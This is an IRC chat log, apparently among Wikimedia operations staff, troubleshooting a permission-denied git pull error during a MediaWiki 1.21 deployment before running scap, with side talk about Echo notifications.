[19:57:11] error: unable to unlink old 'RELEASE-NOTES-1.21' (Permission denied) [19:57:45] Ryan_Lane hm what about this for now? https://wikitech.wikimedia.org/wiki/Template:ShellGranted [19:57:56] that'll work for now [19:58:07] * Ryan_Lane hates adding stuff to user's talk pages [19:58:10] I tried it again and got the following errors: [19:58:13] heh [19:58:22] actually I like welcome messages on wikipedias [19:58:28] they contain useful links [19:58:29] :) [19:58:32] error: Your local changes to the following files would be overwritten by merge [19:58:40] kaldari: are you getting that on sync, or some other part of the processs? [19:58:43] and then it lists all the files from the update besides the release notes [19:58:48] petan: echo also provides those links [19:59:05] what's echo in mediawiki? [19:59:05] guess I should try resetting and re-pulling [19:59:05] kaldari: so, this is when doing a git pull [19:59:10] yeah [19:59:18] kaldari: is there anything unmerged? [19:59:28] kaldari: resetting will wipe those changes out [19:59:31] it's dangerous [20:00:06] yeah, all the files that were updated by the half-finished pull (but nothing else as far as I can tell) [20:00:09] petan: echo is the new notification system [20:00:14] ah [20:00:18] yes that would be better [20:00:21] petan: it's installed on wikitech [20:00:28] it's the number, with the dropdown [20:00:37] I've seen it on mediawiki too [20:00:42] I'll just reset those individual files [20:00:49] kaldari: that's a better idea [20:00:51] kaldari: use checkout [20:00:54] not reset [20:01:10] ok [20:01:55] Speaking of Echo, is there already a bug for "the popup is not visible in monobook"? [20:02:06] I'd like the css to work in all skins [20:02:12] Ryan_Lane these non existing users, were they test users or something went wrong? [20:02:15] it's also broken in the strapping skin [20:02:15] like Arun289 [20:02:26] petan: I don't know [20:02:36] ok [20:02:39] petan: Maybe it's users that failed to add somehow? [20:02:45] I really don't know how those are showing up [20:03:15] Re-checked out all the files affected by the incomplete pull, tried the pull again and got the same error on the Release Notes: unable to unlink old 'RELEASE-NOTES-1.21' (Permission denied) [20:03:31] permission denied? [20:03:38] that sounds like someone did a pull as root [20:03:43] one second [20:03:43] should I try sudo git pull? [20:03:45] which directory is this [20:03:48] no. definitely not [20:03:59] home/wikipedia/common/php-1.21wmf11 [20:04:34] -rw-rw-r-- 1 reedy wikidev 19197 Mar 4 18:33 RELEASE-NOTES-1.21 [20:04:34] hm [20:04:48] o_0 [20:05:22] we should put in hooks that disallow root from making git changes [20:05:37] it's probably fucked up objects in the .git folder [20:05:49] I guess this could also be a umask problem [20:05:57] we should have similar hooks for that [20:06:06] it's not files owned by root [20:09:03] pizza time! [20:13:12] Ryan_Lane, Reedy: Let me know when I should try again. Still have 45 mins left in my window. [20:37:15] kaldari: I've just done git pull and 2 submodule updates... [20:37:24] should be at least able to push your code out [20:38:32] Reedy: thanks [21:10:11] kaldari: looks like we're up on test, but we're getting the usual garbage where message caches aren't updating or what have you [21:10:12] http://test.wikipedia.org/wiki/Special:GettingStarted [21:11:02] StevenW: yeah, that's OK [21:11:15] Yep, we usually just push to prod when I see that. :) [23:14:05] new staffer ABaso(WMF) ? [23:14:12] yes [23:14:14] Adam Baso [23:14:16] k, thx [23:14:40] saw nothing announced, not on list, and not creatd at m: by staff [23:16:33] tarred and feathered [23:31:33] about to run scap! [23:34:26] Brace yourself! [23:34:35] scap executed! [23:45:07] All hands, brace for impact!